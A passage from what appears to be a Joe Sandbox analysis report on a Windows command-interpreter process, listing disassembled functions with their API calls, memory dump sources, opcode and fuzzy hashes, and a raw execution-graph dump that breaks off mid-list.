                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AEF
                                                                                        • Part of subcall function 00007FF793754A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                        • Part of subcall function 00007FF793754A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                        • Part of subcall function 00007FF793754A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                        • Part of subcall function 00007FF793754A14: memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                        • Part of subcall function 00007FF793754A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF79375EE64
                                                                                      • RtlFreeHeap.NTDLL ref: 00007FF79375EE78
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                      • String ID:
                                                                                      • API String ID: 2759988882-0
                                                                                      • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                      • Instruction ID: 5de7056080f00e2e662a0390ca99d76782414ecfabfae58d30bbe00afe527b89
                                                                                      • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                      • Instruction Fuzzy Hash: 4BF06820A19B8287FFA4677594841B8E9E5FF8EB42F889034CD0F52340EF3CA5048771
                                                                                      Function 00007FF79376F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 1606018815-0
                                                                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                      • Instruction ID: 58579cb642fae9a1478f900e78e56a7db1ffae218ce948543bc6e503a6b7a757
                                                                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                      • Instruction Fuzzy Hash: D1F03731624A42CBE7546B20E48417DFAA4FB8EB03FC49234DA0F12394DF3CD1088B61
                                                                                      Function 00007FF7937710D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF79376827A), ref: 00007FF7937711DC
                                                                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF79376827A), ref: 00007FF793771277
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcessmemmovewcschr
                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                      • API String ID: 1135967885-381716982
                                                                                      • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                      • Instruction ID: cdb83d35fa5b77e32f8fe7f98466407e4391bb31a7b78aa3011ea5c0f2e2e3bb
                                                                                      • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                      • Instruction Fuzzy Hash: A0718B71A0824285E7B0EF35A4C06B9FAE8FB5C795F904235DA5EA7B94DF3CA4418B10
                                                                                      Function 00007FF79374E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                        • Part of subcall function 00007FF79374EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F000
                                                                                        • Part of subcall function 00007FF79374EF40: wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F031
                                                                                        • Part of subcall function 00007FF79374EF40: iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F0D6
                                                                                      • longjmp.MSVCRT ref: 00007FF79375CCBC
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375CCE0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                      • API String ID: 3282654869-1994581435
                                                                                      • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                      • Instruction ID: 99633e7b5e42baa270dfa065b0535cb58dc77fad7db15a9d08ef94ad39ac433f
                                                                                      • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                      • Instruction Fuzzy Hash: B261D661B0964282FAB5BB3594D8279E3A9AF4DBB4FD44535CA1D27BD1EE3CF4408320
                                                                                      Function 00007FF7937708EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memmovewcsncmp
                                                                                      • String ID: 0123456789
                                                                                      • API String ID: 3879766669-2793719750
                                                                                      • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                      • Instruction ID: af59d75762b152ca902993d159d517179d91700b54b454e3fa65e5b11c6e95f4
                                                                                      • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                      • Instruction Fuzzy Hash: F541F622F1878681EEB5AF3594802BAA398FB4CB81F855131CE0E63784EE3CD4458790
                                                                                      Function 00007FF793769784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7937697D0
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7937698D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                      • String ID: Software\Classes
                                                                                      • API String ID: 2714550308-1656466771
                                                                                      • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                      • Instruction ID: dacf6999200dd19bdc707ea145f539139a00c2689baff153b4ec786f7ba3b869
                                                                                      • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                      • Instruction Fuzzy Hash: 7441D622B09B12C1EBA0EB25D494039A3AAFB4D7D4F909131DE5E537D1DF38E842C350
                                                                                      Function 00007FF79376A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376A0FC
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376A1FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                      • String ID: Software\Classes
                                                                                      • API String ID: 2714550308-1656466771
                                                                                      • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                      • Instruction ID: c9b7cb568daea7bb68fde1f28dc672474092396fb4d67924aa0124a7b5e25a10
                                                                                      • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                      • Instruction Fuzzy Hash: BB41D422B09B1281EAE4EB25D494439A3B9FB4C7D4F808131DE5E533E0EE39E841C352
                                                                                      Function 00007FF79374CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleTitle
                                                                                      • String ID: -
                                                                                      • API String ID: 3358957663-3695764949
                                                                                      • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                      • Instruction ID: 942e3e00dff8ddca126de80ca22a2274e5039e8ee7ca43377ba6905402f44a0f
                                                                                      • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                      • Instruction Fuzzy Hash: EA319025A0874382FAA4BB31A8C4178EAA9FB4DB90F944535DD0E27B95EF3CF441C764
                                                                                      Function 00007FF793757280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmpswscanf
                                                                                      • String ID: :EOF
                                                                                      • API String ID: 1534968528-551370653
                                                                                      • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                      • Instruction ID: 18c9e24bbaed6799506e45e81a01954543d1d1373b7de5f41b8c8036e45d582e
                                                                                      • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                      • Instruction Fuzzy Hash: 7C317831E0C68696F7B87B35A8C4279F2A9EF5D751FC44132DA4D26251DF2CE4418760
                                                                                      Function 00007FF793743BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmp
                                                                                      • String ID: /-Y
                                                                                      • API String ID: 1886669725-4274875248
                                                                                      • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                      • Instruction ID: 933df7ec9d4531cf0f7f0a647e6882fe3861c6e257788bb51cad2ac6043d301b
                                                                                      • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                      • Instruction Fuzzy Hash: 93217165B0875681FAB0AB229488178F6E6BB5CFC0F849031DE4D277D4DE3CE4A2D720
                                                                                      Function 00007FF79374B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3$3
                                                                                      • API String ID: 0-2538865259
                                                                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                      • Instruction ID: 9dc80985a065e34141df25e1f924d7897ce801a02ebdf7e79c9789b1bf148745
                                                                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                      • Instruction Fuzzy Hash: 7C015B31D0A1428AF7F4BB70A8C8274F6B9BF5C321FD50135C44E215A1CF2C38958672
                                                                                      Function 00007FF7937506C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                      • Instruction ID: f0f40249d2e67cbd2a680be8f2a71dc3394fdc690c79a20915f94f55ab6bd68f
                                                                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                      • Instruction Fuzzy Hash: 7B415E71A0964286FAA8AF34E4C4179BBE8FF49B40B948539C64E13750DF3CE544CB60

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.7%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:780
                                                                                      Total number of Limit Nodes:21
                                                                                      execution_graph 18624 7ff79374b8c0 18627 7ff79374be00 18624->18627 18628 7ff79374b8d4 18627->18628 18629 7ff79374be1b 18627->18629 18629->18628 18630 7ff79374be67 18629->18630 18631 7ff79374be47 memset 18629->18631 18632 7ff79374be73 18630->18632 18635 7ff79374bf29 18630->18635 18636 7ff79374beaf 18630->18636 18733 7ff79374bff0 18631->18733 18634 7ff79374be92 18632->18634 18638 7ff79374bf0c 18632->18638 18644 7ff79374bea1 18634->18644 18661 7ff79374c620 GetConsoleTitleW 18634->18661 18637 7ff79374cd90 166 API calls 18635->18637 18636->18628 18642 7ff79374bff0 185 API calls 18636->18642 18640 7ff79374bf33 18637->18640 18771 7ff79374b0d8 memset 18638->18771 18640->18636 18645 7ff79374bf70 18640->18645 18648 7ff7937488a8 _wcsicmp 18640->18648 18642->18628 18644->18636 18650 7ff79374af98 2 API calls 18644->18650 18655 7ff79374bf75 18645->18655 18884 7ff7937471ec 18645->18884 18646 7ff79374bf1e 18646->18636 18649 7ff79374bf5a 18648->18649 18649->18645 18831 7ff793750a6c 18649->18831 18650->18636 18651 7ff79374bfa9 18651->18636 18653 7ff79374cd90 166 API calls 18651->18653 18654 7ff79374bfbb 18653->18654 18654->18636 18656 7ff79375081c 166 API calls 18654->18656 18657 7ff79374b0d8 194 API calls 18655->18657 18656->18655 18658 7ff79374bf7f 18657->18658 18658->18636 18704 7ff793755ad8 18658->18704 18662 7ff79374ca2f 18661->18662 18664 7ff79374c675 18661->18664 18663 7ff79375c5fc GetLastError 18662->18663 18666 7ff793743278 166 API calls 18662->18666 18667 7ff79375855c ??_V@YAXPEAX 18662->18667 18663->18662 18665 7ff79374ca40 17 API calls 18664->18665 18673 7ff79374c69b 18665->18673 18666->18662 18667->18662 18668 7ff79374c9b5 18672 7ff79375855c ??_V@YAXPEAX 18668->18672 18669 7ff7937489c0 23 API calls 18683 7ff79374c762 18669->18683 18670 7ff79374c978 towupper 18670->18683 18671 7ff79375855c ??_V@YAXPEAX 18671->18683 18692 7ff79374c855 18672->18692 18673->18662 18673->18668 18675 7ff79374d3f0 223 API calls 18673->18675 18673->18683 18674 